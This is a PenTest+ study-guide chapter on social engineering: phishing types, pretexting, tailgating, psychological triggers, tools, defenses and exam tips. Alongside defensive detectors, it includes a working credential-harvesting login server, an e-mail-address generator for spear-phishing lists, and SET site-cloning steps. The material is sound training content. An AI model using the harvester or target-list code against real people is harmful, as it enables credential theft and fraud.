This chapter covers social engineering attacks, a core part of the PT0-002 exam's Attacks and Exploits domain (Objective 3.6, "perform a social engineering or physical attack"). Social engineering exploits human psychology rather than technical vulnerabilities, which makes it one of the most reliable initial-access vectors in real engagements. Attacks and Exploits is the most heavily weighted domain on the exam (30%), so expect several questions on social engineering principles, techniques, and defenses, including phishing, pretexting, and tailgating.
Social engineering is like a con artist following a carefully rehearsed script to gain access to a secured building. The con artist first researches the target—learning employee names, company jargon, and even the coffee brand in the break room. This is the reconnaissance phase. Then, they choose a pretext: posing as an IT support technician who needs to 'verify credentials' due to a server breach. They call the front desk, using the employee names they found on LinkedIn, and speak with confidence and urgency. The receptionist, wanting to help, provides the IT director's extension. The con artist then calls the IT director, citing a made-up ticket number, and asks for a password reset 'for security purposes.' The director, flustered by the urgency and the accurate internal jargon, complies. The con artist now has credentials. Just like a con artist relies on human psychology—authority, urgency, and the desire to be helpful—rather than technical exploits, a social engineer manipulates people, not systems. The 'script' is the attack vector; the 'building access' is the compromised account or sensitive information.
What Is Social Engineering and Why Does It Exist?
Social engineering is the psychological manipulation of people into performing actions or divulging confidential information. It exists because the human element is often the weakest link in security. No firewall or encryption can stop a user from willingly handing over their password. The PT0-002 exam emphasizes that social engineering attacks are often the first step in a multi-stage penetration test, used to gain initial access or gather intelligence.
The Social Engineering Attack Cycle
Social engineering follows a predictable cycle:
- Reconnaissance: The attacker gathers information about the target from public sources (OSINT) such as social media, company websites, and job postings. This includes employee names, email address formats, organizational structure, and even personal interests.
- Pretexting: The attacker creates a fabricated scenario (pretext) to engage the target. This could be impersonating a help desk technician, a vendor, or a fellow employee.
- Engagement: The attacker initiates contact via phone, email, in person, or social media, using psychological triggers such as authority, urgency, scarcity, or reciprocity.
- Exploitation: The target performs the desired action: clicking a link, providing credentials, or granting physical access.
- Execution (post-exploitation): The attacker uses the obtained information or access to achieve their objective, such as installing malware or exfiltrating data.
Types of Social Engineering Attacks
#### Phishing
Phishing is the most common social engineering attack, typically delivered via email. The attacker sends a message that appears to come from a legitimate source (e.g., a bank, IT department, or colleague) with the goal of stealing credentials or deploying malware.
- Spear Phishing: Targeted phishing aimed at a specific individual or organization. The attacker customizes the message using reconnaissance data (e.g., "Hi John, I saw your post about the server migration...").
- Whaling: Spear phishing targeting high-profile individuals such as executives or CFOs. The pretext often involves legal or financial urgency.
- Vishing (Voice Phishing): Phishing conducted over the phone. The attacker may spoof caller ID to appear as a trusted entity.
- Smishing (SMS Phishing): Phishing via SMS text messages. Common pretexts include package delivery notifications or account alerts.
- Pharming: Redirecting users from a legitimate website to a fraudulent one without any link to click, typically by poisoning DNS responses or modifying the victim's local hosts file or resolver settings. The browser still shows the hostname the user typed, which is why this is classified separately from phishing.
#### Pretexting
Pretexting involves creating a fabricated scenario to obtain information. For example, an attacker might call an employee posing as an IT auditor and ask for network configuration details. The success of pretexting relies on the attacker's ability to establish credibility through research and confident delivery.
#### Baiting
Baiting offers something enticing (e.g., a free USB drive labeled "Employee Bonuses") in exchange for information or access. The victim picks up the USB drive and plugs it into their computer, which then runs the attacker's payload. The PT0-002 objectives refer to this as a USB drop key attack.
#### Tailgating (Piggybacking)
Tailgating is physically following an authorized person into a restricted area without authenticating. The attacker may pretend to have forgotten their badge or carry heavy boxes to appear legitimate. Some sources reserve "piggybacking" for the case where the badge holder knowingly lets the attacker in; the exam treats both as the same physical technique.
#### Quid Pro Quo
Quid pro quo offers a service or benefit in exchange for information. For example, an attacker posing as IT support offers to fix a non-existent computer issue in exchange for the user's password.
#### Watering Hole Attack
A watering hole attack compromises a website frequently visited by the target group (e.g., an industry forum). When the target visits the site, malware is delivered via a drive-by download. The attacker never contacts the target directly.
#### Impersonation
Impersonation involves pretending to be someone else (a coworker, a vendor, or a law enforcement officer) to gain trust. This can be done in person, over the phone, or via email.
Psychological Principles Exploited
Authority: People tend to comply with requests from authority figures (e.g., "This is the CEO's office, I need the financial reports immediately").
Urgency: Creating a sense of urgency bypasses rational thinking (e.g., "Your account will be locked in 24 hours unless you verify now").
Scarcity: Offering something limited (e.g., "Only the first 50 respondents get a free gift") prompts quick action.
Social Proof: People follow the actions of others (e.g., "All your colleagues have already updated their passwords").
Liking: People are more likely to comply with requests from individuals they like (e.g., an attacker who mirrors the victim's interests).
Reciprocity: People feel obligated to return a favor (e.g., sending a small gift before asking for information).
Consistency: People tend to act consistently with their previous commitments (e.g., "You agreed to help with security, so please provide your password").
Social Engineering in Penetration Testing
On the PT0-002 exam, you must understand how social engineering fits into a penetration test. The PenTest+ methodology includes:
- Planning and Scoping: Define rules of engagement (e.g., is phishing allowed? Are there restrictions on pretexting? Which employees, hours, and pretexts are off-limits?).
- Information Gathering and Vulnerability Scanning: Use OSINT to identify targets and gather pretext material.
- Attacks and Exploits: Execute social engineering attacks (e.g., send phishing emails, make vishing calls).
- Reporting and Communication: Document findings and provide recommendations.
Penetration testers often use specialized tools:
- Social Engineering Toolkit (SET): A framework for automating phishing attacks, credential harvesting (via cloned login pages), and more.
- GoPhish: An open-source phishing framework for creating, sending, and tracking campaigns.
- BeEF (Browser Exploitation Framework): Hooks a victim's browser through a page the target is lured to, then drives client-side attacks through the hooked browser.
- Maltego: For OSINT gathering and relationship mapping.
Defenses Against Social Engineering
Security Awareness Training: Regular training on recognizing phishing attempts, pretexting, and other tactics. Simulated phishing campaigns are common.
Policies and Procedures: Clear guidelines for verifying identity (e.g., "Never give out passwords over the phone").
Technical Controls: Email filtering (including sender authentication with SPF, DKIM, and DMARC), multi-factor authentication (MFA), and web filtering reduce the impact of successful social engineering; they do not prevent a user from being deceived.
Physical Security: Badge readers, mantrap systems, and visitor logs prevent tailgating.
Incident Response: Procedures for reporting suspected social engineering attempts.
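Email filtering, listed under Technical Controls above, is where most of the indicators from this chapter's phishing section become checks a gateway can actually run. The following is an added example written for this guide, not any real mail filter's code: it scores a message for display-name spoofing of an executive, a lookalike sender domain, a mismatched Reply-To, a missing DMARC pass on mail claiming the internal domain, and urgency wording. The internal domain, the executive list, the thresholds, and the two sample messages are assumptions constructed for the demo.

```python
"""Score an inbound message for common phishing indicators.

Added example for this study guide, not taken from any mail gateway.
INTERNAL_DOMAIN, EXECUTIVES, the regex and the sample messages are
constructed assumptions."""
import email
import re
from email.utils import parseaddr

INTERNAL_DOMAIN = "example-bank.test"          # assumed: the organisation's real domain
EXECUTIVES = {"sarah chen", "miguel o'brien"}  # assumed: display names worth protecting
URGENCY = re.compile(
    r"\b(urgent|immediately|within 24 hours|wire|account will be (?:locked|suspended))\b", re.I)


def skeleton(domain: str) -> str:
    """Collapse a domain to a comparable form: undo common homoglyph swaps
    (0/o, 1/l, 3/e, 5/s, 7/t, rn/m, vv/w) and drop punctuation."""
    d = domain.lower().replace("rn", "m").replace("vv", "w")
    d = d.translate(str.maketrans("01357", "olest"))
    return re.sub(r"[^a-z]", "", d)


def looks_like_internal(domain: str) -> bool:
    """True if a foreign domain could pass for ours at a glance."""
    if not domain or domain.lower() == INTERNAL_DOMAIN:
        return False
    base = skeleton(INTERNAL_DOMAIN.split(".")[0])
    return skeleton(domain) == skeleton(INTERNAL_DOMAIN) or base in skeleton(domain)


def score_message(raw: str) -> dict:
    """Return the indicators found in one RFC 5322 message plus a simple count score."""
    msg = email.message_from_string(raw)
    display, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    findings = []

    if display.strip().lower() in EXECUTIVES and from_domain != INTERNAL_DOMAIN:
        findings.append("display-name spoof: executive name on an external address")
    if looks_like_internal(from_domain):
        findings.append(f"lookalike sender domain: {from_domain}")
    if reply_to and reply_to.rsplit("@", 1)[-1].lower() != from_domain:
        findings.append("Reply-To domain differs from From domain")
    auth = msg.get("Authentication-Results", "").lower()
    if from_domain == INTERNAL_DOMAIN and "dmarc=pass" not in auth:
        findings.append("claims our domain but did not pass DMARC")
    # Urgency wording in the subject and every text/plain part of the body.
    text = msg.get("Subject", "")
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            text += " " + (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
    hits = sorted({m.group(0).lower() for m in URGENCY.finditer(text)})
    if hits:
        findings.append("urgency language: " + ", ".join(hits))
    return {"from": addr, "findings": findings, "score": len(findings)}


# Constructed sample: a BEC-style message from a lookalike domain.
SAMPLE_BEC = """From: Sarah Chen <sarah.chen@examp1e-bank.test>
Reply-To: s.chen.cfo@mail.test
To: finance@example-bank.test
Subject: Urgent wire needed before 3pm
Authentication-Results: mx.example-bank.test; dmarc=none

I'm in a meeting and need you to process a wire immediately. I'll send details.
"""

# Constructed sample: ordinary internal mail that passed DMARC.
SAMPLE_OK = """From: Payroll <payroll@example-bank.test>
To: all@example-bank.test
Subject: March newsletter
Authentication-Results: mx.example-bank.test; spf=pass dkim=pass dmarc=pass

The March newsletter is attached.
"""

if __name__ == "__main__":
    for sample in (SAMPLE_BEC, SAMPLE_OK):
        result = score_message(sample)
        print(result["from"], result["score"], result["findings"])
```

A real gateway would weight these indicators rather than count them and would add link and attachment analysis, but the structure is the same: every one of the "tells" taught for awareness training is also a machine-checkable header or body property.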
Interaction with Other Technologies
Social engineering often bypasses technical controls. For example, even with MFA, an attacker who tricks a user into approving a push notification can gain access; only phishing-resistant factors such as FIDO2/WebAuthn security keys, which are bound to the legitimate site's origin, resist this. Social engineering is also used in conjunction with other attack types, such as:
- Credential Harvesting: Phishing pages that capture usernames and passwords.
- Malware Delivery: Phishing emails with malicious attachments or links.
- Business Email Compromise (BEC): Impersonating executives to authorize fraudulent wire transfers.
Key Exam Values and Defaults
SET credential harvester listener: port 80 for HTTP, 443 when SSL is enabled in set.config.
GoPhish default admin interface: https://127.0.0.1:3333 (bound to loopback only); default phishing listener: port 80 on all interfaces.
Phishing open and click-through rates: there are no standardized exam values. Industry reports vary widely; generic mass phishing commonly sees single-digit to low-double-digit click rates, while researched spear phishing is markedly higher. Treat the comparison (targeted beats generic) as the exam fact, not any specific percentage.
Verification Commands (Linux)
To set up a credential-harvesting phishing page with SET (menu numbers follow SET's current main menu):
```bash
sudo setoolkit
# Select 1) Social-Engineering Attacks
# Select 2) Website Attack Vectors
# Select 3) Credential Harvester Attack Method
# Select 2) Site Cloner
# Enter the IP address for the POST back (your listener), then the URL to clone
```
To start GoPhish:
```bash
./gophish
# Admin interface at https://127.0.0.1:3333
# The initial admin password is printed to the console on first start
```
Summary
Social engineering is a human-focused attack that exploits psychological vulnerabilities. For the PT0-002 exam, know the attack types (phishing, pretexting, baiting, tailgating, quid pro quo, watering hole, impersonation), the psychological principles (authority, urgency, scarcity, social proof, liking, reciprocity, consistency), and the phases of a social engineering attack (reconnaissance, pretexting, engagement, exploitation, execution/post-exploitation). Be familiar with tools like SET and GoPhish, and understand how social engineering fits into the penetration testing lifecycle.
Reconnaissance and Target Selection
The attacker gathers information about the target organization and potential victims. Sources include LinkedIn, company websites, job postings, social media, and data breaches. The attacker identifies key personnel (e.g., IT staff, executives) and learns company terminology, email formats, and internal processes. This phase determines the pretext and attack vector. For example, finding that the company uses a specific HR portal allows the attacker to craft a convincing phishing email about 'HR benefits updates.' The depth of reconnaissance directly impacts attack success.
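One concrete reconnaissance task from this phase (and from the Reconnaissance step of the attack cycle above) is working out the target's e-mail address convention, so that names harvested from LinkedIn become deliverable addresses for a spear-phishing list. The following is an added example written for this guide, not code from SET, Maltego, or any other tool mentioned here; the pattern table is the usual set of corporate conventions, and the names and domain are constructed sample data.

```python
"""Infer an organisation's e-mail address convention from a few known
(name, address) pairs and generate candidates for other employees.

Added example for this study guide, not part of any listed tool.
PATTERNS is the usual set of corporate conventions; KNOWN and the
target names are constructed sample data."""
import re
from collections import Counter

# Candidate conventions: label -> function of (first, last), both lower-case letters only.
PATTERNS = {
    "first.last": lambda f, l: f"{f}.{l}",
    "firstlast":  lambda f, l: f"{f}{l}",
    "flast":      lambda f, l: f"{f[0]}{l}",
    "first_last": lambda f, l: f"{f}_{l}",
    "lastf":      lambda f, l: f"{l}{f[0]}",
    "first":      lambda f, l: f,
    "last.first": lambda f, l: f"{l}.{f}",
}


def normalise(name: str) -> str:
    """Lower-case and strip anything that is not a letter (apostrophes, hyphens)."""
    return re.sub(r"[^a-z]", "", name.lower())


def infer_format(samples):
    """samples: iterable of (full_name, email). Returns (best_pattern, confidence),
    where confidence is the fraction of samples that matched the winning pattern."""
    votes = Counter()
    samples = list(samples)
    for full_name, address in samples:
        parts = full_name.split()
        if len(parts) < 2:
            continue  # cannot vote without a first and last name
        first, last = normalise(parts[0]), normalise(parts[-1])
        local = address.split("@", 1)[0].lower()
        for label, fn in PATTERNS.items():
            if fn(first, last) == local:
                votes[label] += 1
    if not votes:
        return None, 0.0
    label, count = votes.most_common(1)[0]
    return label, count / len(samples)


def generate(names, domain, pattern):
    """Build candidate addresses for target names using the inferred pattern."""
    fn = PATTERNS[pattern]
    out = []
    for full_name in names:
        parts = full_name.split()
        if len(parts) < 2:
            continue
        out.append(f"{fn(normalise(parts[0]), normalise(parts[-1]))}@{domain}")
    return out


# Constructed sample: addresses scraped from a company site, press releases
# or breach dumps during reconnaissance.
KNOWN = [
    ("Sarah Chen", "schen@example-bank.test"),
    ("Miguel O'Brien", "mobrien@example-bank.test"),
    ("Priya Raman-Patel", "pramanpatel@example-bank.test"),
]

if __name__ == "__main__":
    fmt, conf = infer_format(KNOWN)
    print(f"format={fmt} confidence={conf:.0%}")
    for addr in generate(["Dana Whitfield", "Luis Ortega"], "example-bank.test", fmt):
        print(addr)
```

Three matching samples are enough to settle the convention with high confidence; a low confidence value (for example when half the samples are legacy addresses in a different format) is itself useful intelligence, because it tells the tester which names to double-check before sending.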
Pretext Development
Using the gathered intelligence, the attacker creates a believable scenario. For a vishing attack, the attacker might pose as a help desk technician calling about a 'security patch.' The pretext includes specific details—like the target's name, department, and recent IT tickets—to establish credibility. The attacker rehearses the script, anticipating questions. For phishing, the pretext is embedded in the email body, often referencing real events (e.g., 'Your package from Amazon is delayed'). The goal is to make the target feel the request is legitimate and urgent.
Engagement and Psychological Manipulation
The attacker initiates contact using the chosen vector (email, phone, in-person). During engagement, they apply psychological triggers: authority (impersonating a manager), urgency (limited-time offer), or reciprocity (offering a small favor). The attacker maintains a confident tone and uses technical jargon appropriate to the pretext. For example, a vishing attacker might say, 'I'm from the IT security team. We detected a breach on your machine. I need you to run this command to verify your system.' The target, feeling pressured, complies without thinking critically.
Exploitation and Information Gathering
The target performs the desired action, such as clicking a link, providing credentials, or allowing physical access. In a phishing attack, the target enters their username and password on a fake login page, which the attacker captures. In a tailgating scenario, the target holds the door for the attacker. The attacker may also install malware (e.g., via a malicious USB) or extract sensitive information over the phone. This step yields the objective: credentials, data, or access.
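The fake login page in this step is what SET's Credential Harvester / Site Cloner option produces. The following is an added example written for this guide (not SET's or Gophish's own code): a standard-library Python harvester that serves a login form, records whatever is POSTed, and redirects the victim to the legitimate site so the failure looks like a mistyped password. The target domain, the form field names, and the port are assumptions, and it belongs only inside an authorized engagement's rules of engagement.

```python
"""Minimal credential-harvesting page of the kind SET's Site Cloner builds.

Added example for this study guide, not SET's or Gophish's code, for use
only within an authorised engagement. REAL_SITE, the form field names and
the port are assumptions."""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs
import datetime

REAL_SITE = "https://portal.example-bank.test/login"  # assumed legitimate target
CAPTURED = []                                         # in-memory log for the demo

# A stripped-down stand-in for the cloned page; SET copies the real page's HTML.
FORM_HTML = b"""<html><body><h2>Sign in</h2>
<form method="POST" action="/">
Username <input name="username"><br>
Password <input name="password" type="password"><br>
<input type="submit" value="Sign in"></form></body></html>"""


def parse_credentials(body: bytes, client_ip: str = "0.0.0.0") -> dict:
    """Extract the interesting fields from a url-encoded POST body.
    The record carries a UTC timestamp so the tester can line it up with the
    campaign timeline in the report; any other fields are kept under 'extra'."""
    fields = parse_qs(body.decode("utf-8", errors="replace"), keep_blank_values=True)
    return {
        "time": datetime.datetime.now(datetime.timezone.utc).isoformat(),
        "ip": client_ip,
        "username": fields.pop("username", [""])[0],
        "password": fields.pop("password", [""])[0],
        "extra": {k: v[0] for k, v in fields.items()},
    }


class Harvester(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(FORM_HTML)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        record = parse_credentials(self.rfile.read(length), self.client_address[0])
        CAPTURED.append(record)
        # Bounce the victim to the real login page; they assume a typo and retry.
        self.send_response(302)
        self.send_header("Location", REAL_SITE)
        self.end_headers()

    def log_message(self, *args):  # keep the console quiet for the demo
        pass


def run(port: int = 8080):
    HTTPServer(("0.0.0.0", port), Harvester).serve_forever()


if __name__ == "__main__":
    run()
```

What the harvester captures is only as useful as the target's authentication allows: a password alone is enough against accounts with no MFA, a password plus a vished one-time code defeats OTP-based MFA, but a FIDO2/WebAuthn authenticator will not sign for this page because its origin is not the real site's.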
Post-Exploitation and Covering Tracks
After obtaining the desired information, the attacker may use it for further attacks (e.g., logging into email, pivoting to other systems) or exfiltrate data immediately. To avoid detection, the attacker deletes logs, removes phishing pages, and uses anonymizing tools (e.g., VPNs, Tor). In a penetration test, the tester documents the findings and may demonstrate the impact. The final step is reporting, including recommendations for mitigating similar attacks in the future.
Scenario 1: Spear Phishing Attack on a Financial Institution
A penetration testing firm was hired to assess the security of a mid-sized bank. The tester used OSINT to identify the CFO, Sarah, and learned from LinkedIn that she was attending a financial conference. The tester crafted a spear-phishing email posing as the conference organizer, requesting Sarah to 'confirm her registration' by clicking a link. The link led to a fake login page mimicking the conference portal. Sarah entered her corporate email credentials, which the tester captured. Using those credentials, the tester accessed the bank's email system and found a spreadsheet with wire transfer details. The test demonstrated that even a single compromised executive account could lead to significant data exposure. The remediation included implementing MFA and conducting security awareness training focused on spear phishing.
Scenario 2: Tailgating and Physical Access at a Tech Company
During a physical penetration test, the tester arrived at the company's lobby carrying a large box labeled 'IT Equipment.' The tester waited for an employee to badge in, then asked, 'Could you hold the door? I have my hands full.' The employee complied, and the tester gained access to the secure office area. Once inside, the tester plugged a Raspberry Pi into an unused network jack, which provided remote access to the internal network from outside. The company had no mantrap or visitor escort policy. The fix was to implement a mantrap system and enforce a strict policy that all visitors must be escorted, even if they appear to be employees.
Scenario 3: Vishing Attack on a Healthcare Provider
An attacker called the help desk of a hospital, posing as a doctor who had forgotten his password. The attacker used a spoofed caller ID that matched the hospital's main number. The help desk technician, following procedure, asked for the doctor's employee ID. The attacker provided an ID obtained from a discarded hospital newsletter. The technician reset the password and gave the new temporary password over the phone. The attacker then logged into the hospital's system and accessed patient records. This incident led to a HIPAA violation. The hospital implemented a callback verification process and prohibited password resets over the phone.
Common Misconfigurations and Pitfalls
Over-reliance on technology: Companies invest in firewalls and IDS but neglect user training. Social engineering bypasses technical controls.
Inconsistent policies: Some departments enforce verification, others don't. Attackers exploit the weakest link.
Failure to update training: Phishing techniques evolve; annual training is insufficient. Continuous simulated phishing is more effective.
Not reporting incidents: Employees may feel embarrassed and fail to report attempted attacks, allowing attackers to refine their methods.
What PT0-002 Tests on Social Engineering (Objective 3.6)
The exam focuses on your ability to identify different types of social engineering attacks and the psychological principles behind them. Specifically, you must:
Distinguish between phishing, spear phishing, whaling, vishing, smishing, and pharming.
Recognize pretexting, baiting, tailgating, quid pro quo, and watering hole attacks.
Understand the role of social engineering in the penetration testing lifecycle.
Know the tools used (SET, GoPhish, BeEF, Maltego).
Apply appropriate defenses and countermeasures.
Common Wrong Answers and Why Candidates Choose Them
Confusing phishing with pharming: Candidates often think pharming is just a type of phishing. In reality, pharming redirects users to fake websites via DNS poisoning or malicious code, without requiring the user to click a link. The wrong answer might say 'pharming uses deceptive emails,' which is incorrect.
Mixing up pretexting and baiting: Pretexting involves a fabricated scenario (e.g., 'I'm from IT, I need your password'), while baiting offers something enticing (e.g., a free USB). The wrong answer might describe a USB drop as pretexting.
Forgetting that social engineering can be physical: Some candidates only think of digital attacks. Tailgating and impersonation are physical social engineering. The exam may describe a scenario where an attacker follows an employee into a building—that's tailgating, not phishing.
Underestimating the importance of OSINT: Candidates may not realize that reconnaissance is the foundation of social engineering. The exam might ask which step comes first—the answer is reconnaissance.
Specific Numbers and Terms to Memorize
SET default ports: 80 (HTTP), 443 (HTTPS).
GoPhish admin port: 3333.
Phishing click-through rates: no fixed exam value; the testable point is that targeted (spear) phishing succeeds far more often than generic mass phishing.
BEC (Business Email Compromise): A type of impersonation attack targeting wire transfers.
MFA: Multi-factor authentication limits what a stolen password alone can do, but it does not stop all social engineering (e.g., tailgating, or MFA fatigue against push-based factors).
Edge Cases and Exceptions
Social engineering via social media: Attackers may use fake profiles to befriend employees and extract information over time.
Reverse social engineering: The attacker creates or claims a problem, advertises themselves as the person who can fix it (e.g., as IT support), and waits for victims to initiate contact. Because the victim made the approach, their usual suspicion of an unsolicited caller is absent.
Insider threats: Social engineering can be used by malicious insiders who already have some access.
How to Eliminate Wrong Answers
If the scenario involves a phone call, it's vishing, not phishing.
If the scenario involves a USB drive left in the parking lot, it's baiting.
If the scenario involves an attacker claiming to be from IT and asking for a password, it's pretexting.
If the scenario involves an email with a link to a fake login page, it's phishing (or spear phishing if targeted).
Use the psychological trigger: urgency? authority? reciprocity? Match the attack to the principle.
Social engineering exploits human psychology, not technical vulnerabilities.
The five phases of a social engineering attack: reconnaissance, pretexting, engagement, exploitation, execution (post-exploitation).
Common attack types: phishing, spear phishing, whaling, vishing, smishing, pharming, pretexting, baiting, tailgating, quid pro quo, watering hole, impersonation.
Psychological principles: authority, urgency, scarcity, social proof, liking, reciprocity, consistency.
Tools: Social Engineering Toolkit (SET), GoPhish, BeEF, Maltego.
Defenses: security awareness training, policies, MFA, email filtering, physical security controls.
On the PT0-002 exam, be able to identify the attack type from a scenario and suggest appropriate countermeasures.
Social engineering is often the first step in a penetration test to gain initial access.
These come up on the exam all the time. Here's how to tell them apart.
Phishing
Sent to a large number of recipients indiscriminately.
Uses generic language and pretexts (e.g., 'Dear Customer').
Lower success rate (click-through is typically in the single digits to low double digits).
Easier to detect by email filters due to mass mailing patterns.
Often used for broad credential harvesting or malware distribution.
Spear Phishing
Targeted at a specific individual or organization.
Uses personalized information (e.g., recipient's name, job role, recent activities).
Higher success rate (click-through markedly above generic phishing, often several times the rate).
Harder to detect because it appears more legitimate.
Often used for gaining access to high-value accounts or systems.
Mistake
Social engineering only happens via email.
Correct
Social engineering can occur via phone (vishing), SMS (smishing), in person (tailgating, impersonation), or via social media. The PT0-002 exam tests all vectors.
Mistake
Multi-factor authentication (MFA) completely prevents social engineering.
Correct
MFA limits what a stolen password alone can achieve, but it does not stop tailgating or baiting, and OTP and push-based MFA can themselves be defeated by vishing for the one-time code or by MFA fatigue (repeated push prompts until the user approves one). Only phishing-resistant MFA (FIDO2/WebAuthn) resists the latter.
Mistake
Phishing and spear phishing are the same thing.
Correct
Spear phishing is a targeted form of phishing aimed at a specific individual or organization, using personalized information. Generic phishing is sent to many recipients without customization.
Mistake
Social engineering attacks are always obvious to the victim.
Correct
Well-crafted social engineering attacks are often not obvious. Attackers use research and psychological manipulation to appear legitimate.
Mistake
Only low-level employees fall for social engineering.
Correct
Executives and high-level employees can be targeted (whaling) and may be more susceptible due to their access to sensitive information and tendency to bypass security protocols.
Phishing is conducted via email, while vishing (voice phishing) is conducted over the phone. Both aim to trick victims into revealing sensitive information. The exam may describe a scenario where an attacker calls a user pretending to be from IT—that's vishing. If the attacker sends an email with a malicious link, it's phishing.
Pretexting involves creating a fabricated scenario (pretext) to obtain information, such as impersonating a help desk technician. Baiting offers something enticing (e.g., a free USB drive) to trick the victim. The key difference: pretexting relies on a story, while baiting relies on a physical or digital lure.
SET is an open-source Python framework for automating social engineering attacks. It includes modules for spear phishing, credential harvesting, website cloning, and more. Penetration testers use SET to simulate attacks. On the exam, know that SET can clone websites and capture credentials.
Yes. MFA fatigue attacks (repeatedly sending push notifications until the user approves one) and vishing in which the attacker asks the victim to read out their one-time code both defeat OTP and push-based MFA. Social engineering can also trick users into providing their password; the attacker then logs in with it, and the user approves the resulting MFA prompt, assuming it is their own. Number matching on push prompts and phishing-resistant authenticators (FIDO2/WebAuthn) are the mitigations.
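The push-approval weakness described here (and in the MFA discussion under "Interaction with Other Technologies" and the MFA mistake/correct entry above) leaves a clear trace in the identity provider's logs. This added example, written for this guide rather than taken from any IdP product, flags users who receive a burst of push prompts inside a short window and escalates when the burst ends in an approval. The log line format, the thresholds, and the sample lines are constructed assumptions.

```python
"""Detect MFA-fatigue (push bombing) patterns in authentication logs.

Added example for this study guide; the log format, WINDOW, MAX_PROMPTS
and the LOG sample are constructed, not any vendor's format or tuning."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) event=(?P<event>\S+) ip=(?P<ip>\S+)$")
WINDOW = timedelta(minutes=10)  # assumed detection window
MAX_PROMPTS = 5                 # assumed: this many pushes inside WINDOW is abnormal


def parse(lines):
    """Parse log lines into (timestamp, user, event, ip), skipping non-matching lines."""
    events = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # ignore anything that does not look like an auth event
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
        events.append((ts, m["user"], m["event"], m["ip"]))
    return sorted(events)


def detect(lines):
    """Return {user: verdict}. 'suspected' = MAX_PROMPTS or more pushes inside
    WINDOW; 'compromise' = the burst is followed by an approval."""
    by_user = defaultdict(list)
    for ts, user, event, ip in parse(lines):
        if event.startswith("push_"):
            by_user[user].append((ts, event, ip))
    verdicts = {}
    for user, evs in by_user.items():
        sent = [ts for ts, ev, _ in evs if ev == "push_sent"]
        start = 0
        for end in range(len(sent)):            # sliding window over push timestamps
            while sent[end] - sent[start] > WINDOW:
                start += 1
            if end - start + 1 >= MAX_PROMPTS:
                approved = any(ev == "push_approved" and ts >= sent[start]
                               for ts, ev, _ in evs)
                verdicts[user] = "compromise" if approved else "suspected"
                break
    return verdicts


# Constructed sample log: one bombing run that ends in approval (schen), a normal
# login (mobrien), slow prompts that never fill the window (praman), and a run
# the user kept denying (dwhit).
LOG = """\
2024-03-04T02:10:05Z user=schen event=push_sent ip=198.51.100.9
2024-03-04T02:10:06Z user=schen event=push_denied ip=198.51.100.9
2024-03-04T02:10:40Z user=schen event=push_sent ip=198.51.100.9
2024-03-04T02:10:41Z user=schen event=push_denied ip=198.51.100.9
2024-03-04T02:11:12Z user=schen event=push_sent ip=198.51.100.9
2024-03-04T02:12:00Z user=schen event=push_sent ip=198.51.100.9
2024-03-04T02:12:30Z user=schen event=push_sent ip=198.51.100.9
2024-03-04T02:12:35Z user=schen event=push_approved ip=198.51.100.9
2024-03-04T08:01:00Z user=mobrien event=push_sent ip=192.0.2.44
2024-03-04T08:01:07Z user=mobrien event=push_approved ip=192.0.2.44
2024-03-04T08:30:00Z user=praman event=push_sent ip=192.0.2.51
2024-03-04T08:40:00Z user=praman event=push_sent ip=192.0.2.51
2024-03-04T08:51:00Z user=praman event=push_sent ip=192.0.2.51
2024-03-04T09:02:00Z user=praman event=push_sent ip=192.0.2.51
2024-03-04T09:13:00Z user=praman event=push_sent ip=192.0.2.51
2024-03-04T09:13:05Z user=praman event=push_denied ip=192.0.2.51
2024-03-04T23:00:00Z user=dwhit event=push_sent ip=203.0.113.7
2024-03-04T23:00:30Z user=dwhit event=push_sent ip=203.0.113.7
2024-03-04T23:01:00Z user=dwhit event=push_sent ip=203.0.113.7
2024-03-04T23:01:30Z user=dwhit event=push_sent ip=203.0.113.7
2024-03-04T23:02:00Z user=dwhit event=push_sent ip=203.0.113.7
2024-03-04T23:02:10Z user=dwhit event=push_denied ip=203.0.113.7
not an auth event, should be ignored
"""

if __name__ == "__main__":
    for user, verdict in detect(LOG.splitlines()).items():
        print(f"{user}: {verdict}")
```

Detection is the second line: the preventive control is a per-user rate limit on push prompts at the identity provider together with number matching, so that a bombed user cannot approve a prompt without typing the number shown on the attacker's screen. Note that a valid login from the victim's own password is what triggers each push, so a "compromise" verdict also means that password needs resetting.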
The best defenses are physical security controls like mantrap systems (two interlocking doors that prevent more than one person from entering at a time), strict visitor escort policies, and security awareness training that encourages employees to challenge strangers. On the exam, tailgating is often mitigated by a mantrap.
A watering hole attack compromises a website that the target group frequently visits (e.g., an industry forum). The attacker injects malicious code that delivers malware to visitors. Unlike phishing, the attacker does not directly contact the target; they wait for the target to come to the compromised site.
BEC is a type of impersonation attack where the attacker poses as a company executive (often the CEO) and sends an email to an employee (e.g., in finance) requesting an urgent wire transfer. It relies on social engineering principles of authority and urgency. BEC is a form of spear phishing.